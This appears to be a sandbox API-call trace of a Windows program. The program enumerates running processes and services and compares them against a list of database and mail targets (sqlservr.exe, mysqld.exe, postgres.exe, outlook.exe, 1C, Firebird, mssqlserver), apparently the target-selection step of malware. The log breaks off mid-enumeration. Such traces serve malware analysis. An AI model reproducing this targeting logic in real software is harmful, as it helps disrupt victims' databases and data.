	[0143.435] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0143.435] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0143.435] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0143.435] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0143.435] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0143.435] lstrlenW (lpString="lsass.exe") returned 9
	[0143.435] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0143.435] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0143.435] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0143.435] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0143.435] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0143.435] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0143.435] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0143.435] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0143.435] lstrlenW (lpString="lsm.exe") returned 7
	[0143.435] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0143.435] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0143.436] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0143.436] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0143.436] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0143.436] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0143.436] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0143.436] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0143.436] lstrlenW (lpString="svchost.exe") returned 11
	[0143.436] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0143.436] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0143.436] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0143.436] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0143.436] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0143.436] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0143.436] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0143.436] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0143.436] lstrlenW (lpString="svchost.exe") returned 11
	[0143.436] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0143.437] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0143.437] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0143.437] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0143.437] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0143.437] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0143.437] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0143.437] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0143.437] lstrlenW (lpString="svchost.exe") returned 11
	[0143.437] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0143.437] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0143.437] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0143.437] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0143.437] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0143.437] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0143.437] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0143.437] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0143.437] lstrlenW (lpString="svchost.exe") returned 11
	[0143.438] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0143.438] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0143.438] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0143.438] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0143.438] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0143.438] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0143.438] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0143.438] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0143.438] lstrlenW (lpString="svchost.exe") returned 11
	[0143.438] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0143.438] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0143.438] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0143.438] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0143.438] lstrlenW (lpString="audiodg.exe") returned 11
	[0143.439] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0143.439] lstrlenW (lpString="svchost.exe") returned 11
	[0143.439] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0143.439] lstrlenW (lpString="svchost.exe") returned 11
	[0143.439] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0143.439] lstrlenW (lpString="spoolsv.exe") returned 11
	[0143.439] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0143.440] lstrlenW (lpString="svchost.exe") returned 11
	[0143.440] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0143.440] lstrlenW (lpString="taskhost.exe") returned 12
	[0143.440] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0143.440] lstrlenW (lpString="userinit.exe") returned 12
	[0143.440] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0143.441] lstrlenW (lpString="dwm.exe") returned 7
	[0143.441] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0143.441] lstrlenW (lpString="explorer.exe") returned 12
	[0143.441] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0143.441] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0143.441] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0143.442] lstrlenW (lpString="reader_sl.exe") returned 13
	[0143.442] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0143.442] CloseHandle (hObject=0x388) returned 1
	[0143.442] Sleep (dwMilliseconds=0x1f4) 
	[0144.265] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb616fa8
	[0144.296] EnumServicesStatusExW (in: hSCManager=0xb616fa8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0144.296] GetLastError () returned 0xea
	[0144.297] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc9a) returned 0xb612378
	[0144.297] EnumServicesStatusExW (in: hSCManager=0xb616fa8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb612378, cbBufSize=0xc9a, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb612378, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0144.297] CloseServiceHandle (hSCObject=0xb616fa8) returned 1
	[0144.297] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0144.297] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0144.297] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0144.297] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0144.297] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0144.297] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0144.297] lstrlenW (lpString="AudioSrv") returned 8
	[0144.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0144.298] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0144.298] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0144.298] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0144.298] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0144.298] lstrlenW (lpString="BFE") returned 3
	[0144.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0144.298] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0144.298] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0144.298] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0144.298] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0144.298] lstrlenW (lpString="CryptSvc") returned 8
	[0144.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0144.298] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0144.298] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0144.298] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0144.298] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0144.298] lstrlenW (lpString="CscService") returned 10
	[0144.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0144.298] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0144.298] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0144.298] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0144.298] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0144.298] lstrlenW (lpString="DcomLaunch") returned 10
	[0144.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0144.298] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0144.298] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0144.298] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0144.298] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0144.298] lstrlenW (lpString="Dhcp") returned 4
	[0144.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0144.298] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0144.298] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0144.298] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0144.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0144.299] lstrlenW (lpString="Dnscache") returned 8
	[0144.299] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0144.299] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0144.299] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0144.299] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0144.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0144.299] lstrlenW (lpString="DPS") returned 3
	[0144.299] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0144.299] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0144.299] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0144.299] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0144.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0144.299] lstrlenW (lpString="eventlog") returned 8
	[0144.299] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0144.299] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0144.299] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0144.299] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0144.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0144.299] lstrlenW (lpString="EventSystem") returned 11
	[0144.299] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0144.299] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0144.299] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0144.299] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0144.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0144.299] lstrlenW (lpString="gpsvc") returned 5
	[0144.299] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0144.299] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0144.299] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0144.299] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0144.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0144.299] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0144.299] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0144.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0144.300] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0144.300] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0144.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0144.300] lstrlenW (lpString="lmhosts") returned 7
	[0144.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0144.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0144.300] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0144.300] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0144.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0144.300] lstrlenW (lpString="MMCSS") returned 5
	[0144.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0144.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0144.300] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0144.300] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0144.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0144.300] lstrlenW (lpString="MpsSvc") returned 6
	[0144.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0144.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0144.300] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0144.300] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0144.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0144.300] lstrlenW (lpString="NlaSvc") returned 6
	[0144.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0144.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0144.300] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0144.300] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0144.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0144.300] lstrlenW (lpString="nsi") returned 3
	[0144.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0144.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0144.300] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0144.300] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0144.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0144.301] lstrlenW (lpString="PcaSvc") returned 6
	[0144.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0144.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0144.301] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0144.301] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0144.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0144.301] lstrlenW (lpString="PlugPlay") returned 8
	[0144.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0144.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0144.301] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0144.301] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0144.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0144.301] lstrlenW (lpString="Power") returned 5
	[0144.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0144.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0144.301] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0144.301] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0144.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0144.301] lstrlenW (lpString="ProfSvc") returned 7
	[0144.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0144.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0144.301] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0144.301] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0144.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0144.301] lstrlenW (lpString="RpcEptMapper") returned 12
	[0144.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0144.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0144.301] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0144.301] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0144.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0144.301] lstrlenW (lpString="RpcSs") returned 5
	[0144.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0144.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0144.301] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0144.302] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0144.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0144.302] lstrlenW (lpString="SamSs") returned 5
	[0144.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0144.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0144.302] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0144.302] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0144.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0144.302] lstrlenW (lpString="Schedule") returned 8
	[0144.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0144.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0144.302] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0144.302] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0144.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0144.302] lstrlenW (lpString="SENS") returned 4
	[0144.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0144.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0144.302] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0144.302] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0144.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0144.302] lstrlenW (lpString="ShellHWDetection") returned 16
	[0144.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0144.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0144.302] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0144.302] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0144.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0144.302] lstrlenW (lpString="Spooler") returned 7
	[0144.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0144.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0144.302] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0144.302] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0144.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0144.302] lstrlenW (lpString="Themes") returned 6
	[0144.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0144.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0144.303] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
